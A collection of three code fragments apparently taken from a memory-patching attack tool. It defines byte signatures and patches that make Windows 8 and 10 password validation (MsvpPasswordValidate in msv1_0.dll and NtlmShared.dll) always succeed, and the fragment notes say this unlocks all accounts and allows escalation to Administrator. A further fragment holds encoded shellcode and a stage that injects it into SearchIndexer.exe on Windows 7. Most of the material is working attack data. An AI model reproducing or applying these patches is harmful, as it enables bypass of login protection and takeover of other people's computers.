Ejemplo n.º 1
# Target template
targets = [
    Target(name='find',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x2a0],
                         chunks=[
                             Chunk(chunk=0x9782440e1b5939ff,
                                   chunkoffset=0x00,
                                   patch=0x00,
                                   patchoffset=0x00)
                         ])
           ]),
    Target(name='findall',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x031],
                         chunks=[
Ejemplo n.º 2
     note='Ensures that the password-check always returns true. This will '
     'cause all accounts to no longer require a password, and will '
     'also allow you to escalate privileges to Administrator via the '
     '\'runas\' command.',
     signatures=[
         Signature(os='Windows 10',
                   os_versions=['10.0'],
                   os_architectures=['x64'],
                   executable='NtlmShared.dll',
                   version=None,
                   md5=None,
                   tag=False,
                   offsets=[0x14f],
                   chunks=[
                       Chunk(chunk=0xc60f84,
                             chunkoffset=0x00,
                             patch=0xb001,
                             patchoffset=0x07)
                   ])
     ]),
 Target(
     name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
     note='Ensures that the password-check always returns true. This will '
     'cause all accounts to no longer require a password, and will '
     'also allow you to escalate privileges to Administrator via the '
     '\'runas\' command.',
     signatures=[
         Signature(os='Windows 8',
                   os_versions=['8.0'],
                   os_architectures=['x86'],
                   executable='msv1_0.dll',
                   version=None,
Ejemplo n.º 3
    b'\x44\x69\x72\x3d\x4f\x75\x74\x7c\x41\x70\x70\x3d\x25\x73' +
    b'\x79\x73\x74\x65\x6d\x44\x72\x69\x76\x65\x25\x5c\x57\x49' +
    b'\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32' +
    b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' +
    b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' +
    b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' +
    b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00'
}

# First-stage target. Its note reads "Create page, copy signature to it and
# jump to page"; the single signature below names SearchIndexer.exe on
# Windows 7 SP1 (x86) and pairs the chunk at offset 0x18c with the
# 'alloc_page' entry of the shellcode table as its patch.
# NOTE(review): version and md5 are empty strings, so this entry carries no
# build or hash pin for the executable -- presumably matching then rests on
# the chunk bytes and offset alone; confirm how the matcher treats '' here.
# NOTE(review): the chunk bytes (8b ff 55 8b ec ...) look like an x86
# function prologue, i.e. the patch would land on code; comparing in-memory
# code pages of the named executable with the on-disk image is the natural
# place to detect such an overwrite.
stage1 = Target(
    name='Allocate page',
    note='Create page, copy signature to it and jump to page',
    signatures=[
        Signature(
            os='Windows 7',
            os_versions=['SP1'],
            os_architectures=['x86'],
            executable='SearchIndexer.exe',
            version='',
            md5='',
            tag=False,
            offsets=[0x18c],
            chunks=[
                Chunk(
                    chunk=0x8bff558bec813D,
                    chunkoffset=0,
                    patch=shellcode['alloc_page'],
                    patchoffset=0,
                ),
            ],
        ),
    ],
)


def add_options(group):
    group.add_option('--msfopts',
                     dest='msfopts',